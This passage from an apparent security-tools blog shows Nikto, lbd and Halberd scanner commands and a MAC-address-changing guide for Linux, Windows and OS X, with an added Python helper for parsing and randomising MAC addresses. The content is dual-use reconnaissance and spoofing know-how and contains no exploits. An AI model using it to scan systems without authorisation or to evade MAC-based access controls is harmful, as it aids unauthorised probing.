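    print(unexpected_ports(SAMPLE_XML, {"192.0.2.10": {22, 25}}))  # mysql on 3306 should not be exposed
```

Run periodically against a saved allow-list, this turns the scan into a regression check: a database port that appears in the findings after a deployment is a firewall or bind-address mistake to fix, not something to leave for an outside scanner to find first.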


Nikto


Nikto Web Scanner is a web server scanner that tests web servers for dangerous files/CGIs, outdated server software and other problems.
It performs generic and server type specific checks. It also captures and prints any cookies received.
You can download nikto from here.
Nikto is a Perl script, so we need Perl. On Unix systems it is pre-installed.
You can download Perl from here.
We move into the directory where nikto.pl is. To start nikto:
perl nikto.pl -h ip
For more details: perl nikto.pl -Help

Load balancer detector


Load balancer detector (lbd) is a bash script.
You can download the script from here.
To start the script move into the directory where lbd.sh is.
To start this script we need root (sudo).
./lbd.sh www.sito.it

Halberd


Halberd is a Python script; you can download it from here.
We need Python 2.4 or above to install halberd.
Extract the archive, move into the new directory and type:
python setup.py install
Now we have installed halberd. To start halberd type:
halberd www.sito.it
For more details type: halberd -h

If you have a problem or you need some explanations just write under this post!

Thursday, August 23, 2012

How to change the MAC address on Linux, Windows and OS X systems

A MAC address is a unique identifier assigned to network interfaces for communications on the physical network segment.
MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet.
The standard (IEEE 802) format for printing MAC-48 addresses in human-friendly form is six groups of two hexadecimal digits.

On Linux we can use the terminal:
To find our MAC address we can type: ifconfig

First we must bring the interface down:
ifconfig eth0 down
Then we change our MAC address:
ifconfig eth0 hw ether <new mac address>
e.g.: ifconfig eth0 hw ether AA:BB:CC:DD:EE:FF
Then we must bring the interface up:
ifconfig eth0 up

Now your MAC address is changed!
If you use a WiFi interface your interface is wlan0, not eth0.
When you restart your PC, the MAC address returns to the original one!
Alternatively you can try macchanger: sudo apt-get install macchanger macchanger-gtk
Start macchanger: macchanger-gtk
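Not every six-byte value is a sensible address to hand to ifconfig. The first octet carries two flag bits: the lowest bit marks multicast addresses (an interface must not use one as its own address) and the next bit marks "locally administered" addresses, the range set aside for exactly this kind of manual assignment, as opposed to vendor-assigned ones whose first three bytes (the OUI) identify the manufacturer. The added Python example below (my own, not macchanger's code) parses the printed MAC-48 form described above, reports those bits, and generates a random address with the right bits set; AA:BB:CC:DD:EE:FF from the post is one of the sample inputs.

```python
import re
import secrets

# Six groups of two hex digits with one consistent separator, ':' or '-'.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-])(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")


def parse_mac(text):
    """Parse a printed MAC-48 address into its six bytes; ValueError if malformed."""
    text = text.strip()
    if not MAC_RE.match(text):
        raise ValueError(f"not a MAC-48 address: {text!r}")
    return bytes.fromhex(re.sub(r"[:-]", "", text))


def format_mac(raw):
    """Print bytes in the colon-separated form ifconfig expects."""
    return ":".join(f"{b:02X}" for b in raw)


def describe(text):
    """The two flag bits of the first octet and the vendor prefix (OUI)."""
    raw = parse_mac(text)
    return {
        "multicast": bool(raw[0] & 0x01),             # I/G bit: 0 = unicast, 1 = multicast
        "locally_administered": bool(raw[0] & 0x02),  # U/L bit: 0 = vendor-assigned, 1 = set locally
        "oui": format_mac(raw[:3]),
    }


def random_local_mac():
    """A random address suitable for 'ifconfig eth0 hw ether ...': unicast, with the
    locally-administered bit set so it cannot collide with a vendor-assigned address."""
    raw = bytearray(secrets.token_bytes(6))
    raw[0] = (raw[0] | 0x02) & 0xFE
    return format_mac(raw)


def is_usable_address(text):
    """Reject values an interface should never be given: multicast addresses (odd first octet),
    the all-zero address and the broadcast address."""
    raw = parse_mac(text)
    return not (raw[0] & 0x01) and raw not in (b"\x00" * 6, b"\xff" * 6)


if __name__ == "__main__":
    for sample in ("AA:BB:CC:DD:EE:FF", "00-50-56-12-34-56", "01:00:5E:00:00:01"):
        print(sample, describe(sample), "usable" if is_usable_address(sample) else "not usable")
    print("random locally administered:", random_local_mac())
```

The address used in the post, AA:BB:CC:DD:EE:FF, already has the locally-administered bit set (0xAA = 1010 1010), which is the property a defender looks for too: a locally-administered address on a switch port where a vendor-assigned one is expected is a simple indicator that an interface's address has been changed.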


On Windows we need a program, Mac Makeup. You can download this program here.
Now you can select the interface whose MAC address you want to change.
Now choose Generate random and then click on Change. Now your MAC address is changed!


On OS X we need a program like on Windows: MacDaddy.
You can download MacDaddy here.
MacDaddy can choose a MAC address of a vendor or a random one.
When you change your MAC address you only have to restart your PC, and your MAC address is changed!

If you have a problem or you need some explanations just write under this post!